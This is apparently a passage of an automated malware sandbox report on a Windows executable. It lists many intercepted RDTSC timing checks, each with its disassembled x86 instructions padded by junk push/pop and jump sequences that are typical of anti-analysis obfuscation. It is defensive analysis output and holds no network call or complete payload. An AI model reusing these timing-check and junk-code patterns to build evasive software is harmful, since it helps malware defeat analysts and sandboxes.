Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ACD775 second address: ACD78E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5D20C2475Dh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ACD78E second address: ACD7B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5D20D3D698h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ACD7B1 second address: ACD7CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5D20C24756h 0x00000009 jmp 00007F5D20C24761h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ACD910 second address: ACD916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ACD916 second address: ACD91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ACD91A second address: ACD927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD23A8 second address: AD23C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007F5D20C2475Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F5D20C24756h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD23C5 second address: AD23C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD25CA second address: AD25CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD25CE second address: AD25D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD25D9 second address: AD25E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD25E5 second address: AD25EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD3E73 second address: AD3E8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD3E8D second address: AD3E97 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD3E97 second address: AD3E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD3E9B second address: AD3E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: A64BEE second address: A64BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: A64BF3 second address: A64BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: A64BF8 second address: A64BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD9FF2 second address: AD9FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: A69E1B second address: A69E3C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D20C24756h 0x00000008 jbe 00007F5D20C24756h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jmp 00007F5D20C2475Ah 0x00000016 pop esi 0x00000017 popad 0x00000018 push ebx 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD9461 second address: AD9466 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD9466 second address: AD946C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD946C second address: AD9499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F5D20D3D688h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F5D20D3D6B3h 0x00000015 jmp 00007F5D20D3D693h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AD9CE2 second address: AD9CEC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5D20C2475Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ADE958 second address: ADE970 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D692h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AB0B3F second address: A9056F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5D20C24762h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F5D20C24766h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F5D20C24758h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c lea eax, dword ptr [ebp+1248C827h] 0x00000032 add ecx, 11CC1C0Ah 0x00000038 nop 0x00000039 jmp 00007F5D20C24768h 0x0000003e push eax 0x0000003f jl 00007F5D20C24762h 0x00000045 jg 00007F5D20C2475Ch 0x0000004b nop 0x0000004c mov edi, ebx 0x0000004e call dword ptr [ebp+122D29FEh] 0x00000054 push eax 0x00000055 push edx 0x00000056 push edi 0x00000057 push eax 0x00000058 pop eax 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AB0C96 second address: AB0C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AB1056 second address: AB105A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AB105A second address: 8F7ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F5D20D3D688h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 adc dx, 1F0Dh 0x00000027 push dword ptr [ebp+122D0861h] 0x0000002d add edi, 50C5AAB9h 0x00000033 call dword ptr [ebp+122D29AAh] 0x00000039 pushad 0x0000003a jmp 00007F5D20D3D690h 0x0000003f xor eax, eax 0x00000041 jo 00007F5D20D3D68Ch 0x00000047 add dword ptr [ebp+122D1943h], ebx 0x0000004d mov edx, dword ptr [esp+28h] 0x00000051 add dword ptr [ebp+122D18ABh], eax 0x00000057 mov dword ptr [ebp+122D2DD5h], eax 0x0000005d jnp 00007F5D20D3D696h 0x00000063 mov esi, 0000003Ch 0x00000068 cld 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d cmc 0x0000006e lodsw 0x00000070 clc 0x00000071 cld 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D18ABh], edi 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 jmp 00007F5D20D3D698h 0x00000085 nop 0x00000086 push edi 0x00000087 push eax 0x00000088 push edx 0x00000089 pushad 0x0000008a popad 0x0000008b rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AB110A second address: AB110E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AB110E second address: AB1114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AB1114 second address: AB1132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C2475Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jns 00007F5D20C24756h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AB1132 second address: 8F7ABC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D20D3D688h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F5D20D3D688h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 sub ecx, dword ptr [ebp+122D2D81h] 0x0000002b sbb cl, 0000007Eh 0x0000002e push dword ptr [ebp+122D0861h] 0x00000034 movzx edx, bx 0x00000037 call dword ptr [ebp+122D29AAh] 0x0000003d pushad 0x0000003e jmp 00007F5D20D3D690h 0x00000043 xor eax, eax 0x00000045 jo 00007F5D20D3D68Ch 0x0000004b add dword ptr [ebp+122D1943h], ebx 0x00000051 mov edx, dword ptr [esp+28h] 0x00000055 add dword ptr [ebp+122D18ABh], eax 0x0000005b mov dword ptr [ebp+122D2DD5h], eax 0x00000061 jnp 00007F5D20D3D696h 0x00000067 jng 00007F5D20D3D690h 0x0000006d jmp 00007F5D20D3D68Ah 0x00000072 mov esi, 0000003Ch 0x00000077 cld 0x00000078 add esi, dword ptr [esp+24h] 0x0000007c cmc 0x0000007d lodsw 0x0000007f clc 0x00000080 cld 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 mov dword ptr [ebp+122D18ABh], edi 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f jmp 00007F5D20D3D698h 0x00000094 nop 0x00000095 push edi 0x00000096 push eax 0x00000097 push edx 0x00000098 pushad 0x00000099 popad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AB123A second address: AB12A9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5D20C24768h 0x00000008 jmp 00007F5D20C24762h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jng 00007F5D20C2476Eh 0x00000016 jne 00007F5D20C24768h 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 pushad 0x00000021 push edx 0x00000022 jne 00007F5D20C24756h 0x00000028 pop edx 0x00000029 jns 00007F5D20C24758h 0x0000002f popad 0x00000030 mov eax, dword ptr [eax] 0x00000032 push eax 0x00000033 jbe 00007F5D20C2475Ch 0x00000039 jo 00007F5D20C24756h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 pushad 0x00000045 pushad 0x00000046 push edi 0x00000047 pop edi 0x00000048 push esi 0x00000049 pop esi 0x0000004a popad 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AB14E6 second address: AB152E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F5D20D3D68Ch 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 jne 00007F5D20D3D688h 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F5D20D3D697h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jl 00007F5D20D3D688h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AB1AB5 second address: AB1AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AB1FB2 second address: A91111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D68Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007F5D20D3D68Eh 0x00000010 jnp 00007F5D20D3D688h 0x00000016 nop 0x00000017 or dx, 3BF1h 0x0000001c mov edi, ecx 0x0000001e call dword ptr [ebp+122D3206h] 0x00000024 jmp 00007F5D20D3D692h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 ja 00007F5D20D3D686h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: A91111 second address: A91116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: A91116 second address: A91120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ADDA22 second address: ADDA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnp 00007F5D20C24756h 0x0000000e jmp 00007F5D20C2475Fh 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a jmp 00007F5D20C24761h 0x0000001f jc 00007F5D20C24756h 0x00000025 pop esi 0x00000026 jmp 00007F5D20C2475Fh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ADDA6D second address: ADDA72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ADDA72 second address: ADDAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20C24764h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F5D20C24765h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ADDD22 second address: ADDD30 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D20D3D686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ADDD30 second address: ADDD5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 ja 00007F5D20C24756h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F5D20C24763h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ADDD5E second address: ADDD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5D20D3D686h 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ADDD6D second address: ADDD75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ADDD75 second address: ADDD79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ADDD79 second address: ADDD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F5D20C24762h 0x0000000c jbe 00007F5D20C24756h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ADDED7 second address: ADDEDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDEDB second address: ADDEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5D20C24756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDEE7 second address: ADDF04 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F5D20D3D696h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADE08E second address: ADE094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADE094 second address: ADE09A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADE222 second address: ADE22E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5D20C24756h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADE22E second address: ADE242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F5D20D3D68Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE3772 second address: AE37C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F5D20C24768h 0x0000000b jmp 00007F5D20C24768h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5D20C24761h 0x00000018 jmp 00007F5D20C2475Ch 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE37C8 second address: AE37DE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5D20D3D686h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F5D20D3D686h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE37DE second address: AE37E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE3BE5 second address: AE3C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5D20D3D699h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F5D20D3D68Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE4037 second address: AE4043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007F5D20C24756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE4043 second address: AE4055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jno 00007F5D20D3D686h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE41B3 second address: AE41B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE42F3 second address: AE4301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 js 00007F5D20D3D686h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE4301 second address: AE4309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE4712 second address: AE472C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D696h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE3049 second address: AE3053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5D20C24756h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE3053 second address: AE3061 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE3061 second address: AE3065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE3065 second address: AE3069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AEA508 second address: AEA50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AEA50D second address: AEA53D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D693h 0x00000007 jmp 00007F5D20D3D693h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AEA53D second address: AEA542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27A0 second address: AF27A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27A4 second address: AF27C6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5D20C24756h 0x00000008 jmp 00007F5D20C24762h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27C6 second address: AF27CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27CA second address: AF27D8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5D20C24756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
